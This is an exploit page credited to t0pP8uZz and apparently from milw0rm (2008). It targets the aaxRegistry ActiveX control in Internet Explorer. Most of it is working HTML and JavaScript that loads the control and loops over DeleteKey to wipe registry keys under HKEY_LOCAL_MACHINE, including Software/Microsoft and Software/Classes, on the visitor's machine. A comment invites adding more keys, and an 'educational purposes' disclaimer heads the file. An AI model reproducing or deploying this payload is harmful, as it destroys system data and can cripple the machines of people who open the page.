<HTML>

<!--

	- aaxRegistry (aaxRegistry.ocx) Remote Registry Deletion Exploit -
	
		Author: t0pP8uZz
		Homepage: h4ck-y0u.org / milw0rm.com
		Description: ActiveX Remote Insecure
		
		Report: Tested on Microsoft Windows XP Pro (SP2 ) Internet Explorer 7 Fully Patched
		
		ActiveX: http://www.aaxcomponents.com/aaxRegistry/aaxRegistryTRIALSetup.EXE
	
		The Following Material Is For Educational Purposes Only - I will not be held responsable for any illegal actions.
	
		InternetExplorer can Initialise this ActiveX control, And take advantage of its functions.
		Included in this exploit (POC) is a peice of javascript code lauching the ActiveX control, and executing one of its functions.
		
	Peace.

-->

<OBJECT ID="aaareg" CLASSID="CLSID:5A000763-F048-46C9-8976-A62226ECB31E">Could Not Load ActiveX Control.</OBJECT>
<script language="javascript">
/* - aaxRegistry (aaxRegistry.ocx) Remote Registry Deletion Exploit - */
/*                       Javascript Code By t0pP8uZz                        */

aaareg.SetRootKey("HKEY_LOCAL_MACHINE"); /* Play with keys in HKLM ;) */

var x = [ /* Add new keys below.. Script will loop though and delete*/
			'Software/Microsoft',
			'Software/MDC',
			'Software/Classes'
		];

for(var c=0; c<x.length; c++)
	aaareg.DeleteKey(x[c]);

</script>
</HTML>

# milw0rm.com [2008-05-09]